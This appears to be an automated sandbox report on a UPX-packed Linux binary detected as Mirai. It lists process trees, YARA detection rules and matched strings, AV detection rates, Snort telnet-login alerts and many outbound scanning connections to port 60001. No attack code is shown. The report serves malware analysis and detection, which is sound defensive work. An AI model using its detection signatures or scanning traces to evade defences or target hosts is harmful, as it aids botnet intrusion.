  • rsyslogd (PID: 5765, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5770, Parent: 1)
  • journalctl (PID: 5770, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5772, Parent: 1)
  • systemd-journald (PID: 5772, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5773, Parent: 1)
  • gdm3 (PID: 5773, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5776, Parent: 5773)
    • plymouth (PID: 5776, Parent: 5773, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5790, Parent: 5773)
    • gdm-session-worker (PID: 5790, Parent: 5773, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5796, Parent: 5790, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
    • gdm3 New Fork (PID: 5804, Parent: 5773)
    • Default (PID: 5804, Parent: 5773, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5805, Parent: 5773)
    • Default (PID: 5805, Parent: 5773, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5777, Parent: 1)
  • accounts-daemon (PID: 5777, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5781, Parent: 5777, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5782, Parent: 5781, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5783, Parent: 5782, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5784, Parent: 5783)
          • locale (PID: 5784, Parent: 5783, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5785, Parent: 5783)
          • grep (PID: 5785, Parent: 5783, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 5788, Parent: 1)
  • journalctl (PID: 5788, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5794, Parent: 1)
  • systemd (PID: 5794, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 5802, Parent: 5794)
      • systemd New Fork (PID: 5803, Parent: 5802)
      • 30-systemd-environment-d-generator (PID: 5803, Parent: 5802, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
    • systemd New Fork (PID: 5907, Parent: 5794)
    • systemctl (PID: 5907, Parent: 5794, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
    • systemd New Fork (PID: 5909, Parent: 5794)
    • pulseaudio (PID: 5909, Parent: 5794, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5797, Parent: 1)
  • whoopsie (PID: 5797, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5807, Parent: 1)
  • dbus-daemon (PID: 5807, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5811, Parent: 1)
  • systemd-logind (PID: 5811, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5868, Parent: 1860)
  • pulseaudio (PID: 5868, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5870, Parent: 1)
  • rtkit-daemon (PID: 5870, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5874, Parent: 1)
  • gpu-manager (PID: 5874, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5876, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5877, Parent: 5876)
      • grep (PID: 5877, Parent: 5876, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5884, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5886, Parent: 5884)
      • grep (PID: 5886, Parent: 5884, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5887, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5888, Parent: 5887)
      • grep (PID: 5888, Parent: 5887, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5890, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5891, Parent: 5890)
      • grep (PID: 5891, Parent: 5890, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5892, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5894, Parent: 5892)
      • grep (PID: 5894, Parent: 5892, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5898, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5899, Parent: 5898)
      • grep (PID: 5899, Parent: 5898, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5901, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5902, Parent: 5901)
      • grep (PID: 5902, Parent: 5901, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5905, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5906, Parent: 5905)
      • grep (PID: 5906, Parent: 5905, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5875, Parent: 1)
  • polkitd (PID: 5875, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5885, Parent: 1)
  • agetty (PID: 5885, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5889, Parent: 1)
  • rsyslogd (PID: 5889, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5893, Parent: 1)
  • journalctl (PID: 5893, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5900, Parent: 1)
  • systemd-journald (PID: 5900, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5911, Parent: 1)
  • generate-config (PID: 5911, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5913, Parent: 5911, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5912, Parent: 1860)
  • dbus-daemon (PID: 5912, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5916, Parent: 1)
  • whoopsie (PID: 5916, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5920, Parent: 1)
  • dbus-daemon (PID: 5920, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5923, Parent: 1)
  • systemd-logind (PID: 5923, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5980, Parent: 1)
  • gdm-wait-for-drm (PID: 5980, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5983, Parent: 1860)
  • pulseaudio (PID: 5983, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5985, Parent: 1)
  • rtkit-daemon (PID: 5985, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5989, Parent: 1)
  • polkitd (PID: 5989, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5990, Parent: 1)
  • journalctl (PID: 5990, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5995, Parent: 1)
  • agetty (PID: 5995, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5998, Parent: 1)
  • rsyslogd (PID: 5998, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6002, Parent: 1)
  • journalctl (PID: 6002, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6004, Parent: 1)
  • systemd-journald (PID: 6004, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6006, Parent: 1)
  • gdm3 (PID: 6006, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 6012, Parent: 6006)
    • plymouth (PID: 6012, Parent: 6006, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 6023, Parent: 6006)
    • gdm-session-worker (PID: 6023, Parent: 6006, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm3 New Fork (PID: 6031, Parent: 6006)
    • Default (PID: 6031, Parent: 6006, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 6032, Parent: 6006)
    • Default (PID: 6032, Parent: 6006, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6010, Parent: 1)
  • journalctl (PID: 6010, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 6013, Parent: 1)
  • accounts-daemon (PID: 6013, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6018, Parent: 6013, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6019, Parent: 6018, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6020, Parent: 6019, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6021, Parent: 6020)
          • locale (PID: 6021, Parent: 6020, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6022, Parent: 6020)
          • grep (PID: 6022, Parent: 6020, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6026, Parent: 1)
  • whoopsie (PID: 6026, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 6034, Parent: 1)
  • dbus-daemon (PID: 6034, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6039, Parent: 1)
  • systemd-logind (PID: 6039, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
VAkpLB9NSD | SUSP_ELF_LNX_UPX_Compressed_File | Detects a suspicious ELF binary with UPX compression | Florian Roth
  • 0x75fa:$s2: $Id: UPX
  • 0x75ab:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Mirai_12 | Yara detected Mirai | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
5276.1.00000000ef4583d0.000000004edce43f.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
5281.1.00000000ef4583d0.000000004edce43f.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
5275.1.00000000ef4583d0.000000004edce43f.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
5279.1.00000000ef4583d0.000000004edce43f.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
5274.1.00000000ef4583d0.000000004edce43f.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
Showing 5 of 31 memory-dump entries.

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: VAkpLB9NSD | Virustotal: Detection: 34%
Source: VAkpLB9NSD | ReversingLabs: Detection: 39%
Source: /usr/bin/pulseaudio (PID: 5375) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5496) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5635) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5678) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5749) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5868) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5913) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5983) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: unknown | HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36462 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35688 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35692 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35694 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 492 INFO TELNET login failed 110.180.117.97:23 -> 192.168.2.23:51002
Source: Traffic | Snort IDS: 492 INFO TELNET login failed 189.3.92.97:23 -> 192.168.2.23:33908
Source: Traffic | Snort IDS: 492 INFO TELNET login failed 189.3.92.97:23 -> 192.168.2.23:33930
Connects to many ports of the same IP (likely port scanning)
Source: global traffic | TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 36712 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 54592 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 58692 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 33338 -> 60001
Source: unknown | Network traffic detected: HTTP traffic on port 57906 -> 60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 171.102.13.175:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 112.114.94.30:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 154.37.70.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 75.228.14.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 141.45.30.133:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 196.53.234.170:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.14.240.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 143.135.131.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.184.129.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.121.202.124:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 135.235.135.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.172.106.219:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 93.205.206.139:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.37.32.192:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.183.135.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 212.233.166.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 182.34.225.105:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 130.120.198.188:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 212.163.112.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 195.154.184.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 87.115.119.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 145.223.47.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 207.238.217.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 84.248.141.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 18.62.91.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 137.0.161.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 89.212.127.218:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 38.61.77.202:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 187.26.132.148:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 213.254.110.241:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 118.185.150.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 99.39.214.80:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 143.148.128.32:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 63.159.160.168:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 223.178.183.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 175.91.32.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 17.27.143.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 128.94.219.197:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 144.4.139.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 58.96.147.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 174.175.231.65:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 63.209.16.135:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 216.30.97.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 9.3.25.85:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 209.81.110.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 23.159.247.35:60001
    Source: global trafficTCP traffic: 192.168.2.23:62642 -> 139.114.68.95:60001
